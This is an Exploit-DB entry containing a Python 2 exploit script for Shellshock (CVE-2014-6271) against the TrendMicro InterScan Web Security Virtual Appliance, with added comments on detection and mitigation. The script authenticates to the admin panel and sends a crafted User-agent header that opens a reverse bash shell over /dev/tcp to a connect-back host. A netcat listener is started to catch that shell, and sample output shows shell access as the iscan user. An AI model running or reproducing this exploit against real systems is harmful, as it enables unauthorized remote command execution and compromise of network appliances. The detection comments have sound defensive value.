TrendMicro InterScan Web Security Virtual Appliance - 'Shellshock' Remote Command Injection

EDB-ID:

40619




Platform:

Hardware

Date:

2016-10-21


#!/usr/bin/env python
# TrendMicro InterScan Web Security Virtual Appliance
# ==================================================
# InterScan Web Security is a software virtual appliance that 
# dynamically protects against the ever-growing flood of web 
# threats at the Internet gateway exclusively designed to secure 
# you against traditional and emerging web threats at the Internet 
# gateway. The appliance, however, is shipped with a vulnerable
# version of Bash susceptible to Shellshock (I know right?). An
# attacker can exploit this vulnerability by calling the CGI
# shell script "/cgi-bin/cgiCmdNotify", which can be exploited
# to perform arbitrary code execution. A limitation of this 
# vulnerability is that the attacker must have credentials for
# the admin web interface to exploit this flaw. The panel runs
# over HTTP by default so a man-in-the-middle attack could be
# used to gain credentials and compromise the appliance.
# 
# $ python trendmicro_IWSVA_shellshock.py 192.168.56.101 admin password 192.168.56.1
# [+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit
# [-] Authenticating to '192.168.56.101' with 'admin' 'password'
# [-] JSESSIONID = DDE38E62757ADC00A51311F1F953EEBA
# [-] exploiting shellshock CVE-2014-6271...
# bash: no job control in this shell
# bash-4.1$ id
# uid=498(iscan) gid=499(iscan) groups=499(iscan)
# 
# -- Hacker Fantastic 
#
# (https://www.myhackerhouse.com)
import requests
import sys
import os

def spawn_listener():
	"""Run a local netcat listener on TCP port 8080 by shelling out to `nc -l 8080`.

	The call blocks until `nc` exits. The port is hard-coded and is the same
	port that appears in the User-agent value built by shellshock().
	"""
	# Defender note: on the appliance side the matching event is an outbound
	# TCP connection to port 8080 of a host that is not an expected upstream.
	# Egress filtering on the appliance's own traffic limits that path.
	os.system("nc -l 8080")

def shellshock(ip,session,cbip):
	"""Send one authenticated GET to /cgi-bin/cgiCmdNotify with a CVE-2014-6271 header.

	ip      -- appliance address; the request goes over plain HTTP to port 1812
	session -- JSESSIONID value of a logged-in admin session, sent as a cookie
	cbip    -- address concatenated into the /dev/tcp/<cbip>/8080 part of the header

	Returns None. The response is assigned to `myreq` and never inspected, so
	the function itself gives no indication of whether the target was affected.
	"""
	# The User-agent value starts with the Bash function-definition marker
	# "() {" followed by a command. Per the file header, cgiCmdNotify is a
	# shell script run by a Bash that is vulnerable to Shellshock; such a
	# Bash runs the text after the function body when it imports the value.
	#
	# Detection: request headers whose value begins with "() {", and requests
	# to /cgi-bin/cgiCmdNotify on port 1812 from hosts that are not admin
	# workstations. The sample output in the file header shows the resulting
	# shell running as uid `iscan`, so an interactive bash owned by that
	# account is a further indicator.
	# Mitigation: update the appliance so its bundled Bash is patched for
	# CVE-2014-6271, and restrict network access to the admin interface.
	user_agent = {'User-agent': '() { :; }; /bin/bash -i >& /dev/tcp/'+cbip+'/8080 0>&1'}
	cookies = {'JSESSIONID': session}
	print "[-] exploiting shellshock CVE-2014-6271..."
	myreq = requests.get("http://"+ip+":1812/cgi-bin/cgiCmdNotify", headers = user_agent, cookies = cookies)

def login_http(ip,user,password):
	"""Log in to the admin web interface and return the session's JSESSIONID.

	ip       -- appliance address; the form is posted over plain HTTP to port 1812
	user     -- admin user name, sent as the `uid` form field
	password -- admin password, sent as the `passwd` form field

	Returns the JSESSIONID cookie value taken from the first response in the
	redirect chain, or None if that response set no such cookie.
	"""
	# Defender note: the credentials travel in cleartext because the URL is
	# http://. The file header points out that the panel runs over HTTP by
	# default, which is what makes credential capture on the network path
	# possible. Serving the admin interface over TLS and limiting it to a
	# management network closes that route.
	mydata = {'wherefrom':'','wronglogon':'no','uid':user, 'passwd':password,'pwd':'Log+On'}
	# The user name and password are echoed to stdout here, so they end up in
	# terminal scrollback and any captured output.
	print "[-] Authenticating to '%s' with '%s' '%s'" % (ip,user,password)
	myreq = requests.post("http://"+ip+":1812/uilogonsubmit.jsp", data=mydata)	
	# `history` holds the redirect responses that preceded the final one. The
	# cookie is read from the first of them. If the POST was not redirected
	# the list is empty and this line raises IndexError.
	session_cookie = myreq.history[0].cookies.get('JSESSIONID')
	# The live session identifier is printed as well.
	print "[-] JSESSIONID = %s" % session_cookie 
	return session_cookie

# Script entry point. Written for Python 2 (print statements).
# Expects four positional arguments: <ip> <user> <pass> <connectback_ip>.
if __name__ == "__main__":
	print "[+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit"
	if len(sys.argv) < 5:
		print "[-] use with <ip> <user> <pass> <connectback_ip>"
		sys.exit()
	# Fork so the blocking listener and the HTTP requests run side by side:
	# the child (fork() returned 0) runs the listener, the parent logs in and
	# sends the crafted request.
	# NOTE(review): the `if`/`else` lines below are indented with spaces
	# followed by a tab, unlike the tab-only lines around them.
	newRef=os.fork()
    	if newRef==0:
		spawn_listener()
    	else:
		# The session value is passed on unchecked. login_http() returns None
		# when no JSESSIONID cookie was set, so a failed login is not detected.
		session = login_http(sys.argv[1],sys.argv[2],sys.argv[3])
		shellshock(sys.argv[1],session,sys.argv[4])